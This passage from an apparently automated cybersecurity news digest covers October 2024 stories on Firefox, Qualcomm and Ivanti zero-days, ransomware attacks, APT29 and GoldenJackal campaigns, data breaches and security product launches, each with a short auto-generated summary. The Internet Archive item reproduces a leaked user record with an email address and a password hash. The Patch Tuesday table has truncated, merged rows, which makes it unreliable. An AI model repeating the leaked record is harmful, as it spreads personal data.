        ESET released its updated ESET Vulnerability and Patch Management module. With the new update, ESET V&PM has expanded to support Linux1 (desktops and servers), as well as macOS2 devices, covering broader parts of a business’ ecosystem. The V&PM module is also now presented in a new dashboard, improved for greater visibility and transparency, enhancing its ease of use while giving an instant overview of vulnerability and patching status across a network. “We believe that top-level … More

        The post ESET updates Vulnerability and Patch Management module appeared first on Help Net Security.

        "

        Autosummary: "


        Actively exploited Firefox zero-day fixed, update ASAP! (CVE-2024-9680)

        exploits
        2024-10-10 https://www.helpnetsecurity.com/2024/10/10/cve-2024-9680/

        Mozilla has pushed out an emergency update for its Firefox and Firefox ESR browsers to fix a vulnerability (CVE-2024-9680) that is being exploited in the wild. About CVE-2024-9680 Reported by ESET malware researcher Damien Schaeffer, CVE-2024-9680 is a use-after-free vulnerability in the browser’s Animation timelines and, according to Mozilla, has been exploited to achieve code execution in the content process. Additional details about the vulnerability or the attacks are yet to be shared. According to … More

        The post Actively exploited Firefox zero-day fixed, update ASAP! (CVE-2024-9680) appeared first on Help Net Security.

        "

        Autosummary: "


        Experts Warn of Critical Unpatched Vulnerability in Linear eMerge E3 Systems

        exploits
        2024-10-10 https://thehackernews.com/2024/10/experts-warn-of-critical-unpatched.html
        Cybersecurity researchers are warning about an unpatched vulnerability in Nice Linear eMerge E3 access controller systems that could allow for the execution of arbitrary operating system (OS) commands. The flaw, assigned the CVE identifier CVE-2024-9441, carries a CVSS score of 9.8 out of a maximum of 10.0, according to VulnCheck. "A vulnerability in the Nortek Linear eMerge E3 allows "

        Autosummary: "


        US, UK warn of Russian APT29 hackers targeting Zimbra, TeamCity servers

        government rusia-ucrania
        2024-10-10 https://www.bleepingcomputer.com/news/security/us-uk-warn-of-russian-apt29-hackers-targeting-zimbra-teamcity-servers/
        U.S. and U.K. cyber agencies warned today that APT29 hackers linked to Russia's Foreign Intelligence Service (SVR) target vulnerable Zimbra and JetBrains TeamCity servers "at a mass scale." [...] "

        Autosummary: "


        Fidelity Investments says data breach affects over 77,000 people

        financial
        2024-10-10 https://www.bleepingcomputer.com/news/security/fidelity-investments-says-data-breach-affects-over-77-000-people/
        Fidelity Investments, a Boston-based multinational financial services company, disclosed that the personal information of over 77,000 customers was exposed after its systems were breached in August. [...] "

        Autosummary: "


        Underground ransomware claims attack on Casio, leaks stolen data

        exploits ransomware
        2024-10-10 https://www.bleepingcomputer.com/news/security/underground-ransomware-claims-attack-on-casio-leaks-stolen-data/
        The Underground ransomware gang has claimed responsibility for an October 5 attack on Japanese tech giant Casio, which caused system disruptions and impacted some of the firm's services. [...] "

        Autosummary: The leaked data includes: Confidential documents (社外秘), Legal documents, Personal data of employees, Confidential NDAs, Employee payroll information, Patents information, Company financial documents "


        Microsoft Outlook bug blocks email logins, causes app crashes

        exploits
        2024-10-10 https://www.bleepingcomputer.com/news/microsoft/microsoft-outlook-bug-blocks-email-logins-causes-app-crashes/
        Microsoft is investigating an Outlook bug causing desktop app crashes, high system resource usage, and preventing users from logging into their accounts. [...] "

        Autosummary: "


        Akira and Fog ransomware now exploit critical Veeam RCE flaw

        exploits ransomware
        2024-10-10 https://www.bleepingcomputer.com/news/security/akira-and-fog-ransomware-now-exploiting-critical-veeam-rce-flaw/
        Ransomware gangs now exploit a critical security vulnerability that lets attackers gain remote code execution (RCE) on vulnerable Veeam Backup & Replication (VBR) servers. [...] "

        Autosummary: Weeks later, in late March, Finnish cybersecurity and privacy company WithSecure spotted CVE-2023-27532 exploits deployed in attacks linked to the financially motivated FIN7 threat group, known for its links to the Conti, REvil, Maze, Egregor, and BlackBasta ransomware operations. "


        Marriott settles with FTC, to pay $52 million over data breaches

        financial industry
        2024-10-10 https://www.bleepingcomputer.com/news/legal/marriott-settles-with-ftc-to-pay-52-million-over-data-breaches/
        Marriott International and its subsidiary Starwood Hotels will pay $52 million and create a comprehensive information security program as part of settlements for data breaches that impacted over 344 million customers. [...] "

        Autosummary: The exposed data included names, email addresses, postal addresses, phone numbers, dates of birth, and loyalty account information. "


        Telekopye transitions to targeting tourists via hotel booking scam

        financial
        2024-10-10 https://www.welivesecurity.com/en/eset-research/telekopye-hits-new-hunting-ground-hotel-booking-scams/
        ESET Research shares new findings about Telekopye, a scam toolkit used to defraud people on online marketplaces, and newly on accommodation booking platforms "

        Autosummary: Online marketplace scams Always verify the person you are talking with, mainly their history on the platform, age of their account, rating, and location – a location too far away, a fresh account with no history, or a bad rating might be indicators of a scammer. Throughout our tracking of Telekopye, we’ve observed that different Telegram groups implement their own advanced features into the toolkit, aimed at speeding up the scam process, improving communication with targets, protecting phishing websites against disruption by competitors, and other goals. Law enforcement operations In late 2023, after ESET Research had published its two-part series on Telekopye, Czech and Ukrainian police arrested tens of cybercriminals utilizing Telekopye, including the key players, in two joint operations. Telekopye groups have a business-like operation, with a clear hierarchy, defined roles, internal practices – including admission and mentoring processes for newcomers – fixed working hours, and commission payouts for Telekopye administrators. Telekopye is designed to target a large variety of online services in Europe and North America, such as OLX, Vinted, eBay, Wallapop, and others. Neanderthals – members of any Telegram group utilizing Telekopye – gain access to the bot’s UI, which enables simple generation of phishing emails, SMS messages, web pages, and other features. This makes the scam much harder to spot, as the information provided is personally relevant to the victims, arrives via the expected communication channel, and the linked, fake websites look as expected. While our previous research explored the technical and organizational background of Telekopye scams, our latest research describes the scammers’ various efforts to maximize their financial gains – expanding their victim pool, taking advantage of seasonal opportunities, and improving their tools and operations. The page contains prefilled information about a booking, such as the check-in and checkout dates, price, and location. We have described the groups’ various efforts to maximize their financial gains, including expanding their victim pool, taking advantage of seasonal opportunities, and improving their tools and operations. "


        YARA: Open-source tool for malware research

        exploits
        2024-10-09 https://www.helpnetsecurity.com/2024/10/09/yara-open-source-tool-malware-research/

        YARA is a powerful tool designed primarily to aid malware researchers in identifying and categorizing malware samples, though its applications are broader. The tool enables users to create detailed descriptions, or “rules,” for malware families or any other target based on textual or binary patterns. Each rule comprises a collection of strings and a logical expression, forming the criteria for its detection and classification. YARA is a multi-platform tool compatible with Windows, Linux, and macOS. … More

        The post YARA: Open-source tool for malware research appeared first on Help Net Security.

        "

        Autosummary: "


        Cybersecurity jobs available right now: October 9, 2024

        ciber
        2024-10-09 https://www.helpnetsecurity.com/2024/10/09/cybersecurity-jobs-available-right-now-october-9-2024/

        Cloud Cybersecurity Analyst III Texas Health and Human Services | USA | Hybrid – View job details As a Cloud CSAIII, you will be responsible for designing, implementing, and managing security solutions for cloud environments. You will ensure that cloud infrastructures are secure, resilient, and compliant with organizational policies and industry regulations. Your role will involve collaborating with various stakeholders to integrate security best practices into cloud solutions, maintaining a robust security posture, and supporting … More

        The post Cybersecurity jobs available right now: October 9, 2024 appeared first on Help Net Security.

        "

        Autosummary: ICT/Cyber Security Engineer Honeywell | Italy | On-site – View job details As an ICT/Cyber Security Engineer, you will contribute to the designing, engineering, configuring, implementing, commissioning, securing and supporting of ICT infrastructure (Server, Storage, Network, Virtual Platforms) and Enterprise Applications at both new and existing client sites. Penetration Tester PepsiCo | USA | Hybrid – View job details As a Penetration Tester, you will conduct penetration tests across Web applications, APIs, mobile applications, infrastructure, cloud environments, and devices. Data Protection Specialist TeamViewer | Germany | Hybrid – View job details As a Data Privacy Specialist, you will play a critical role in ensuring compliance with data protection laws, supporting day-to-day operations and AI-related projects, managing privacy governance, and collaborating with key stakeholders to drive internal compliance and privacy-related improvements across the organization. Drive all phases of penetration tests and red team engagements, including scoping, planning, communications, timelines, and execution of key activities (reconnaissance, vulnerability identification, exploitation, and reporting). Senior Offensive Cyber Security Engineer Astranis Space Technologies | USA | On-site – View job details As a Senior Offensive Cyber Security Engineer, you will conduct penetration testing, vulnerability assessments, and red team exercises across the company’s digital landscape to identify and mitigate potential security threats before they become incidents. "


        Microsoft Issues Security Update Fixing 118 Flaws, Two Actively Exploited in the Wild

        exploits
        2024-10-09 https://thehackernews.com/2024/10/microsoft-issues-security-update-fixing.html
        Microsoft has released security updates to fix a total of 118 vulnerabilities across its software portfolio, two of which have come under active exploitation in the wild. Of the 118 flaws, three are rated Critical, 113 are rated Important, and two are rated Moderate in severity. The Patch Tuesday update doesn't include the 25 additional flaws that the tech giant addressed in its Chromium-based "

        Autosummary: Five of the vulnerabilities are listed as publicly known at the time of release, with two of them coming under active exploitation as a zero-day - CVE-2024-43572 (CVSS score: 7.8) - Microsoft Management Console Remote Code Execution Vulnerability (Exploitation detected) CVE-2024-43573 (CVSS score: 6.5) - "


        Exploit code for critical GitLab auth bypass flaw released (CVE-2024-45409)

        exploits
        2024-10-09 https://www.helpnetsecurity.com/2024/10/09/exploit-cve-2024-45409/

        If you run a self-managed GitLab installation with configured SAML-based authentication and you haven’t upgraded it since mid-September, do it now, because security researchers have published an analysis of CVE-2024-45409 and an exploit script that may help attackers gain access as any user on GitLab. About CVE-2024-45409 GitLab is a popular software development platform that can be deployed by users on on-premises servers, Kubernetes, or with a cloud provider. CVE-2024-45409 is a critical authentication bypass … More

        The post Exploit code for critical GitLab auth bypass flaw released (CVE-2024-45409) appeared first on Help Net Security.

        "

        Autosummary: "


        Mozilla fixes Firefox zero-day actively exploited in attacks

        exploits
        2024-10-09 https://www.bleepingcomputer.com/news/security/mozilla-fixes-firefox-zero-day-actively-exploited-in-attacks/
        Mozilla has issued an emergency security update for the Firefox browser to address a critical use-after-free vulnerability that is currently exploited in attacks. [...] "

        Autosummary: "


        Microsoft fixes Word bug that deleted documents when saving

        exploits
        2024-10-09 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-word-bug-that-deleted-documents-when-saving/
        Microsoft has fixed a known issue that was causing Word to delete some Windows users' documents instead of saving them. [...] "

        Autosummary: In September, it fixed another known issue affecting Microsoft 365 apps like Outlook, Word, Excel, and OneNote, which triggered crashes when typing or spell-checking a text. "


        Recent Dr.Web cyberattack claimed by pro-Ukrainian hacktivists

        ciber
        2024-10-09 https://www.bleepingcomputer.com/news/security/recent-drweb-breach-claimed-by-dumpforums-pro-ukrainian-hacktivists/
        A group of pro-Ukrainian hacktivists has claimed responsibility for the September breach of Russian security company Doctor Web (Dr.Web). [...] "

        Autosummary: "We managed to hack into and offload the corporate GitLab server where internal development and projects were stored, the corporate mail server, Confluence, Redmine, Jenkins, Mantis, RocketChat - systems where development was conducted and tasks were discussed," DumpForums said. "


        Google Joins Forces with GASA and DNS RF to Tackle Online Scams at Scale

        financial
        2024-10-09 https://thehackernews.com/2024/10/google-joins-forces-with-gasa-and-dns.html
        Google on Wednesday announced a new partnership with the Global Anti-Scam Alliance (GASA) and DNS Research Federation (DNS RF) to combat online scams. The initiative, which has been codenamed the Global Signal Exchange (GSE), is designed to create real-time insights into scams, fraud, and other forms of cybercrime by pooling together threat signals from different data sources in order to create "

        Autosummary: "


        Researchers Uncover Major Security Vulnerabilities in Industrial MMS Protocol Libraries

        industry
        2024-10-09 https://thehackernews.com/2024/10/researchers-uncover-major-security.html
        Details have emerged about multiple security vulnerabilities in two implementations of the Manufacturing Message Specification (MMS) protocol that, if successfully exploited, could have severe impacts in industrial environments. "The vulnerabilities could allow an attacker to crash an industrial device or in some cases, enable remote code execution," Claroty researchers Mashav Sapir and Vera "

        Autosummary: A stack-based buffer overflow vulnerability in libIEC61850 that could lead to a crash or remote code execution
        CVE-2022-2971 (CVSS score: 8.6) - A type confusion vulnerability in libIEC61850 that could allow an attacker to crash the server with a malicious payload
        CVE-2022-2972 (CVSS score: 10.0) - A stack-based buffer overflow vulnerability in libIEC61850 that could lead to a crash or remote code execution
        CVE-2022-2973 (CVSS score: 8.6) - "


        N. Korean Hackers Use Fake Interviews to Infect Developers with Cross-Platform Malware

        exploits
        2024-10-09 https://thehackernews.com/2024/10/n-korean-hackers-use-fake-interviews-to.html
        Threat actors with ties to North Korea have been observed targeting job seekers in the tech industry to deliver updated versions of known malware families tracked as BeaverTail and InvisibleFerret. The activity cluster, tracked as CL-STA-0240, is part of a campaign dubbed Contagious Interview that Palo Alto Networks Unit 42 first disclosed in November 2023. "The threat actor behind CL-STA-0240 "

        Autosummary: "


        Internet Archive hacked, data breach impacts 31 million users

        financial
        2024-10-09 https://www.bleepingcomputer.com/news/security/internet-archive-hacked-data-breach-impacts-31-million-users/
        Internet Archive's "The Wayback Machine" has suffered a data breach after a threat actor compromised the website and stole a user authentication database containing 31 million unique records. [...] "

        Autosummary: 9887370, internetarchive@scotthelme.co.uk,$2a$10$Bho2e2ptPnFRJyJKIn5BiehIDiEwhjfMZFVRM9fRCarKXkemA3PxuScottHelme,2020-06-25,2020-06-25,internetarchive@scotthelme.co.uk,2020-06-25 13:22:52.7608520,\N0\N\N@scotthelme\N\N\N Helme confirmed that the bcrypt-hashed password in the data record matched the bcrypt-hashed password stored in his password manager. "


        CISA says critical Fortinet RCE flaw now exploited in attacks

        exploits
        2024-10-09 https://www.bleepingcomputer.com/news/security/cisa-says-critical-fortinet-rce-flaw-now-exploited-in-attacks/
        Today, CISA revealed that attackers actively exploit a critical FortiOS remote code execution (RCE) vulnerability in the wild. [...] "

        Autosummary: "


        Crypto-stealing malware campaign infects 28,000 people

        exploits
        2024-10-09 https://www.bleepingcomputer.com/news/cryptocurrency/crypto-stealing-malware-campaign-infects-28-000-people/
        Over 28,000 people from Russia, Turkey, Ukraine, and other countries in the Eurasian region were impacted by a large-scale cryptocurrency-stealing malware campaign. [...] "

        Autosummary: "In total, this malware campaign has affected more than 28,000 people, the vast majority of whom are residents of Russia," said Dr. Web. "Significant numbers of infections have also been observed in Belarus, Uzbekistan, Kazakhstan, Ukraine, Kyrgyzstan and Turkey. "


        Palo Alto Networks warns of firewall hijack bugs with public exploit

        exploits
        2024-10-09 https://www.bleepingcomputer.com/news/security/palo-alto-networks-warns-of-firewall-hijack-bugs-with-public-exploit/
        Palo Alto Networks warned customers today to patch security vulnerabilities (with public exploit code) that can be chained to let attackers hijack PAN-OS firewalls. [...] "

        Autosummary: "


        Pro-Ukrainian Hackers Strike Russian State TV on Putin's Birthday

        government rusia-ucrania
        2024-10-08 https://thehackernews.com/2024/10/pro-ukrainian-hackers-strike-russian.html
        Ukraine has claimed responsibility for a cyber attack that targeted Russian state media company VGTRK and disrupted its operations, according to reports from Bloomberg and Reuters. The incident took place on the night of October 7, VGTRK confirmed, describing it as an "unprecedented hacker attack." However, it said "no significant damage" was caused and that everything was working normally "

        Autosummary: Another threat actor that has remained laser-focused on Ukraine is Gamaredon, a Russian hacking crew that's also known as Aqua Blizzard (previously Actinium), Armageddon, Hive0051, Iron Tilden, Primitive Bear, Shuckworm, Trident Ursa, UAC-0010, UNC530, and Winterflounder. "


        Qualcomm Urges OEMs to Patch Critical DSP and WLAN Flaws Amid Active Exploits

        exploits
        2024-10-08 https://thehackernews.com/2024/10/qualcomm-urges-oems-to-patch-critical.html
        Qualcomm has rolled out security updates to address nearly two dozen flaws spanning proprietary and open-source components, including one that has come under active exploitation in the wild. The high-severity vulnerability, tracked as CVE-2024-43047 (CVSS score: 7.8), has been described as a use-after-free bug in the Digital Signal Processor (DSP) Service that could lead to "memory corruption "

        Autosummary: "


        American Water shuts down systems after cyberattack

        ciber
        2024-10-08 https://www.helpnetsecurity.com/2024/10/08/american-water-cyberattack/

        American Water, the largest water and wastewater utility company in the US, has shut down some of its systems following a cyberattack. While the company confirmed that none of its water or wastewater facilities or operations have been negatively affected by the attack, it proactively took its customer portal service (MyWater) offline, and its call center “has limited functionality” while the portal is offline. What happened? New Jersey-based American Water is a public utility company with … More

        The post American Water shuts down systems after cyberattack appeared first on Help Net Security.

        "

        Autosummary: "


        BreachLock Attack Surface Analytics strengthens enterprise CTEM capabilities

        industry
        2024-10-08 https://www.helpnetsecurity.com/2024/10/08/breachlock-attack-surface-analytics/

        BreachLock strengthens continuous threat exposure management (CTEM) capabilities for enterprise customers with its new Attack Surface Analytics feature. Time is of the essence when Fortune 500 security teams find themselves waking up to a Code Red vulnerability being actively exploited. When CISOs urgently request a detailed list of impacted assets, including those running a specific TLS version, which ports are being used, servers involved, and more, along with a patching strategy, that’s where BreachLock’s new … More

        The post BreachLock Attack Surface Analytics strengthens enterprise CTEM capabilities appeared first on Help Net Security.

        "

        Autosummary: The feature provides enterprise users with: All relevant asset intelligence consolidated into a single, cumulative view, with details on the correlation between domains, subdomains, IP addresses and ports, and associated technologies. "


        GoldenJackal Target Embassies and Air-Gapped Systems Using Malware Toolsets

        exploits
        2024-10-08 https://thehackernews.com/2024/10/goldenjackal-target-embassies-and-air.html
        A little-known threat actor tracked as GoldenJackal has been linked to a series of cyber attacks targeting embassies and governmental organizations with an aim to infiltrate air-gapped systems using two disparate bespoke toolsets. Victims included a South Asian embassy in Belarus and a European Union government (E.U.) organization, Slovak cybersecurity company ESET said. "The ultimate goal of "

        Autosummary: " The attack against the South Asian embassy in Belarus is said to have made use of three different malware families, in addition to JackalControl, JackalSteal, and JackalWorm - GoldenDealer , which is used to deliver executables to the air-gapped system via compromised USB drives , which is used to deliver executables to the air-gapped system via compromised USB drives GoldenHowl , a modular backdoor with capabilities to steal files, create scheduled tasks, upload/download files to and from a remote server, and create an SSH tunnel, and , a modular backdoor with capabilities to steal files, create scheduled tasks, upload/download files to and from a remote server, and create an SSH tunnel, and GoldenRobo, a file collector and data exfiltration tool The attacks targeting the unnamed government organization in Europe, on the other hand, have been found to rely on an entirely new set of malware tools mostly written in Go. "


        American Water shut down some of its systems following a cyberattack

        ciber
        2024-10-08 https://securityaffairs.com/169510/hacking/cyber-attack-hit-american-water.html
        American Water, the largest publicly traded water and wastewater utility company in the US, shut down some of its systems following a cyberattack. American Water is an American public utility company that, through its subsidiaries, provides water and wastewater services in […] "

        Autosummary: Pierluigi Paganini, October 08, 2024: American Water, the largest publicly traded water and wastewater utility company in the US, shut down some of its systems following a cyberattack. "


        OTAVA S.E.C.U.R.E. Score simplifies cybersecurity strategy for businesses

        ciber
        2024-10-08 https://www.helpnetsecurity.com/2024/10/08/otava-s-e-c-u-r-e-score/

        OTAVA introduced the OTAVA S.E.C.U.R.E. Score to help businesses further improve their security posture. The S.E.C.U.R.E. Score is a dynamic metric that assesses vulnerabilities, and makes recommendations on how to close security gaps and minimize risk. The S.E.C.U.R.E. acronym stands for Shrink, Examine, Contain, Undo, Recover, and Evaluate – the incremental steps to understanding areas of vulnerability, and how to protect businesses from evolving and escalating cyber threats. “Businesses continue to face increasing threats of … More

        The post OTAVA S.E.C.U.R.E. Score simplifies cybersecurity strategy for businesses appeared first on Help Net Security.

        "

        Autosummary: S.E.C.U.R.E. Score monitors all relevant areas of the cloud services environment, regardless of the vendor, including monitoring, Security Information and Event Management (SIEM), malware solutions, data protection and disaster recovery solutions, patching, and other areas of vulnerability. "


        Qualcomm zero-day under targeted exploitation (CVE-2024-43047)

        exploits
        2024-10-08 https://www.helpnetsecurity.com/2024/10/08/cve-2024-43047/

        An actively exploited zero-day vulnerability (CVE-2024-43047) affecting dozens of Qualcomm’s chipsets has been patched by the American semiconductor giant. About CVE-2024-43047: On Monday, Qualcomm confirmed patches for 20 vulnerabilities affecting both proprietary and open source software running on its various chipsets. Among those is CVE-2024-43047, a use-after-free vulnerability in the Digital Signal Processor (DSP) service that could lead to “memory corruption while maintaining memory maps of [high level operating system (HLOS)] memory.” The vulnerability’s … More

        The post Qualcomm zero-day under targeted exploitation (CVE-2024-43047) appeared first on Help Net Security.

        "

        Autosummary: "


        Cyberattack Group "Awaken Likho" Targets Russian Government with Advanced Tools

        government rusia-ucrania ciber
        2024-10-08 https://thehackernews.com/2024/10/cyberattack-group-awaken-likho-targets.html
        Russian government agencies and industrial entities are the target of an ongoing activity cluster dubbed Awaken Likho. "The attackers now prefer using the agent for the legitimate MeshCentral platform instead of the UltraVNC module, which they had previously used to gain remote access to systems," Kaspersky said, detailing a new campaign that began in June 2024 and continued at least until "

        Autosummary: "


        Microsoft October 2024 Patch Tuesday fixes 5 zero-days, 118 flaws

        exploits
        2024-10-08 https://www.bleepingcomputer.com/news/microsoft/microsoft-october-2024-patch-tuesday-fixes-5-zero-days-118-flaws/
        Today is Microsoft's October 2024 Patch Tuesday, which includes security updates for 118 flaws, including five publicly disclosed zero-days, two of which are actively exploited. [...] "

        Autosummary:
        Tag | CVE ID | CVE Title | Severity
        .NET and Visual Studio | CVE-2024-38229 | .NET and Visual Studio Remote Code Execution Vulnerability | Important
        .NET and Visual Studio | CVE-2024-43485 | .NET and Visual Studio Denial of Service Vulnerability | Important
        .NET, .NET Framework, Visual Studio | CVE-2024-43484 | .NET, .NET Framework, and Visual Studio Denial of Service Vulnerability | Important
        .NET, .NET Framework, Visual Studio | CVE-2024-43483 | .NET, .NET Framework, and Visual Studio Denial of Service Vulnerability | Important
        Azure CLI | CVE-2024-43591 | Azure Command Line Integration (CLI) Elevation of Privilege Vulnerability | Important
        Azure Monitor | CVE-2024-38097 | Azure Monitor Agent Elevation of Privilege Vulnerability | Important
        Azure Stack | CVE-2024-38179 | Azure Stack Hyperconverged Infrastructure (HCI) Elevation of Privilege Vulnerability | Important
        BranchCache | CVE-2024-43506 | BranchCache Denial of Service Vulnerability | Important
        BranchCache | CVE-2024-38149 | BranchCache Denial of Service Vulnerability | Important
        Code Integrity Guard | CVE-2024-43585 | Code Integrity Guard Security Feature Bypass Vulnerability | Important
        DeepSpeed | CVE-2024-43497 | DeepSpeed Remote Code Execution Vulnerability | Important
        Internet Small Computer Systems Interface (iSCSI) | CVE-2024-43515 | Internet Small Computer Systems Interface (iSCSI) Denial of Service Vulnerability | Important
        Microsoft ActiveX | CVE-2024-43517 | Microsoft ActiveX Data Objects Remote Code Execution Vulnerability | Important
        Microsoft Configuration Manager | CVE-2024-43468 | Microsoft Configuration Manager Remote Code Execution Vulnerability | Critical
        Microsoft Defender for Endpoint | CVE-2024-43614 | Microsoft Defender for Endpoint for Linux Spoofing Vulnerability | Important
        Microsoft Edge (Chromium-based) | CVE-2024-9369 | Chromium: CVE-2024-9369 Insufficient data validation in Mojo | Unknown
        Microsoft Edge (Chromium-based) | CVE-2024-9370 | Chromium: CVE-2024-9370 Inappropriate implementation in V8 | Unknown
        Microsoft Edge (Chromium-based) | CVE-2024-7025 | Chromium: CVE-2024-7025 Integer overflow in Layout | Unknown
        Microsoft Graphics Component | CVE-2024-43534 | Windows Graphics Component Information Disclosure Vulnerability | Important
        Microsoft Graphics Component | CVE-2024-43508 | Windows Graphics Component Information Disclosure Vulnerability | Important
        Microsoft Graphics Component | CVE-2024-43556 | Windows Graphics Component Elevation of Privilege Vulnerability | Important
        Microsoft Graphics Component | CVE-2024-43509 | Windows Graphics Component Elevation of Privilege Vulnerability | Important
        Microsoft Management Console | CVE-2024-43572 | Microsoft Management Console Remote Code Execution Vulnerability | Important
        Microsoft Office | CVE-2024-43616 | Microsoft Office Remote Code Execution Vulnerability | Important
        Microsoft Office | CVE-2024-43576 | Microsoft Office Remote Code Execution Vulnerability | Important
        Microsoft Office | CVE-2024-43609 | Microsoft Office Spoofing Vulnerability | Important
        Microsoft Office Excel | CVE-2024-43504 | Microsoft Excel Remote Code Execution Vulnerability | Important
        Microsoft Office SharePoint | CVE-2024-43503 | Microsoft SharePoint Elevation of Privilege Vulnerability | Important
        Microsoft Office Visio | CVE-2024-43505 | Microsoft Office Visio Remote Code Execution Vulnerability | Important
        Microsoft Simple Certificate Enrollment Protocol | CVE-2024-43544 | Microsoft Simple Certificate Enrollment Protocol Denial of Service Vulnerability | Important
        Microsoft Simple Certificate Enrollment Protocol | CVE-2024-43541 | Microsoft Simple Certificate Enrollment Protocol Denial of Service Vulnerability | Important
        Microsoft WDAC OLE DB provider for SQL | CVE-2024-43519 | Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability | Important
        Microsoft Windows Speech | CVE-2024-43574 | Microsoft Speech Application Programming Interface (SAPI) |
        | | Windows Kerberos Information Disclosure Vulnerability | Important
        Windows Kerberos | CVE-2024-38129 | Windows Kerberos Elevation of Privilege Vulnerability | Important
        Windows Kernel | CVE-2024-43502 | Windows Kernel Elevation of Privilege Vulnerability | Important
        Windows Kernel | CVE-2024-43511 | Windows Kernel Elevation of Privilege Vulnerability | Important
        Windows Kernel | CVE-2024-43520 | Windows Kernel Denial of Service Vulnerability | Important
        Windows Kernel | CVE-2024-43527 | Windows Kernel Elevation of Privilege Vulnerability | Important
        Windows Kernel | CVE-2024-43570 | Windows Kernel Elevation of Privilege Vulnerability | Important
        Windows Kernel | CVE-2024-37979 | Windows Kernel Elevation of Privilege Vulnerability | Important
        Windows Kernel-Mode Drivers | CVE-2024-43554 | Windows Kernel-Mode Driver Information Disclosure Vulnerability | Important
        Windows Kernel-Mode Drivers | CVE-2024-43535 | Windows Kernel-Mode Driver Elevation of Privilege Vulnerability | Important
        Windows Local Security Authority (LSA) | CVE-2024-43522 | Windows Local Security Authority (LSA) Elevation of Privilege Vulnerability | Important
        Windows Mobile Broadband | CVE-2024-43555 | Windows Mobile Broadband Driver Denial of Service Vulnerability | Important
        Windows Mobile Broadband | CVE-2024-43540 | Windows Mobile Broadband Driver Denial of Service Vulnerability | Important
        Windows Mobile Broadband | CVE-2024-43536 | Windows Mobile Broadband Driver Remote Code Execution Vulnerability | Important
        Windows Mobile Broadband | CVE-2024-43538 | Windows Mobile Broadband Driver Denial of Service Vulnerability | Important
        Windows Mobile Broadband | CVE-2024-43525 | Windows Mobile Broadband Driver Remote Code Execution Vulnerability | Important
        Windows Mobile Broadband | CVE-2024-43559 | Windows Mobile Broadband Driver Denial of Service Vulnerability | Important
        Windows Mobile Broadband | CVE-2024-43561 | Windows Mobile Broadband Driver Denial of Service Vulnerability | Important
        Windows Mobile Broadband | CVE-2024-43558 | Windows Mobile Broadband Driver Denial of Service Vulnerability | Important
        Windows Mobile Broadband | CVE-2024-43542 | Windows Mobile Broadband Driver Denial of Service Vulnerability | Important
        Windows Mobile Broadband | CVE-2024-43557 | Windows Mobile Broadband Driver Denial of Service Vulnerability | Important
        Windows Mobile Broadband | CVE-2024-43526 | Windows Mobile Broadband Driver Remote Code Execution Vulnerability | Important
        Windows Mobile Broadband | CVE-2024-43543 | Windows Mobile Broadband Driver Remote Code Execution Vulnerability | Important
        Windows Mobile Broadband | CVE-2024-43523 | Windows Mobile Broadband Driver Remote Code Execution Vulnerability | Important
        Windows Mobile Broadband | CVE-2024-43524 | Windows |
        | | Spoofing Vulnerability | Important
        Visual C++ Redistributable Installer | CVE-2024-43590 | Visual C++ Redistributable Installer Elevation of Privilege Vulnerability | Important
        Visual Studio | CVE-2024-43603 | Visual Studio Collector Service Denial of Service Vulnerability | Important
        Visual Studio Code | CVE-2024-43488 | Visual Studio Code extension for Arduino Remote Code Execution Vulnerability | Critical
        Visual Studio Code | CVE-2024-43601 | Visual Studio Code for Linux Remote Code Execution Vulnerability | Important
        Windows Ancillary Function Driver for WinSock | CVE-2024-43563 | Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability | Important
        Windows BitLocker | CVE-2024-43513 | BitLocker Security Feature Bypass Vulnerability | Important
        Windows Common Log File System Driver | CVE-2024-43501 | Windows Common Log File System Driver Elevation of Privilege Vulnerability | Important
        Windows Cryptographic Services | CVE-2024-43546 | Windows Cryptographic Information Disclosure Vulnerability | Important
        Windows cURL Implementation | CVE-2024-6197 | Open Source Curl Remote Code Execution Vulnerability | Important
        Windows EFI Partition | CVE-2024-37982 | Windows Resume Extensible Firmware Interface Security Feature Bypass Vulnerability | Important
        Windows EFI Partition | CVE-2024-37976 | Windows Resume Extensible Firmware Interface Security Feature Bypass Vulnerability | Important
        Windows EFI Partition | CVE-2024-37983 | Windows Resume Extensible Firmware Interface Security Feature Bypass Vulnerability | Important
        Windows Hyper-V | CVE-2024-30092 | Windows Hyper-V Remote Code Execution Vulnerability | Important
        Windows Kerberos | CVE-2024-43547 | |
        | | Remote Code Execution Vulnerability | Important
        Windows Scripting | CVE-2024-43584 | Windows Scripting Engine Security Feature Bypass Vulnerability | Important
        Windows Secure Channel | CVE-2024-43550 | Windows Secure Channel Spoofing Vulnerability | Important
        Windows Secure Kernel Mode | CVE-2024-43516 | Windows Secure Kernel Mode Elevation of Privilege Vulnerability | Important
        Windows Secure Kernel Mode | CVE-2024-43528 | Windows Secure Kernel Mode Elevation of Privilege Vulnerability | Important
        Windows Shell | CVE-2024-43552 | Windows Shell Remote Code Execution Vulnerability | Important
        Windows Standards-Based Storage Management Service | CVE-2024-43512 | Windows Standards-Based Storage Management Service Denial of Service Vulnerability | Important
        Windows Storage | CVE-2024-43551 | Windows Storage Elevation of Privilege Vulnerability | Important
        Windows Storage Port Driver | CVE-2024-43560 | Microsoft Windows Storage Port Driver Elevation of Privilege Vulnerability | Important
        Windows Telephony Server | CVE-2024-43518 | Windows Telephony Server Remote Code Execution Vulnerability | Important
        Winlogon | CVE-2024-43583 | Winlogon Elevation of Privilege Vulnerability | Important
        Update 9/11/24: Updated to explain that only three flaws were actively exploited and why CVE-2024-43491 was marked as exploited. "


        Ivanti warns of three more CSA zero-days exploited in attacks

        exploits
        2024-10-08 https://www.bleepingcomputer.com/news/security/ivanti-warns-of-three-more-csa-zero-days-exploited-in-attacks/
        American IT software company Ivanti has released security updates to fix three new Cloud Services Appliance (CSA) zero-days tagged as actively exploited in attacks. [...] "

        Autosummary: Multiple Ivanti zero-days under active exploitation: Last month, Ivanti warned that threat actors were chaining an admin bypass vulnerability (CVE-2024-8963) with a command injection bug (CVE-2024-8190) to bypass admin authentication and execute arbitrary commands on unpatched CSA appliances. "


        European govt air-gapped systems breached using custom malware

        exploits
        2024-10-08 https://www.bleepingcomputer.com/news/security/european-govt-air-gapped-systems-breached-using-custom-malware/
        An APT hacking group known as GoldenJackal has successfully breached air-gapped government systems in Europe using two custom toolsets to steal sensitive data, like emails, encryption keys, images, archives, and documents. [...] "

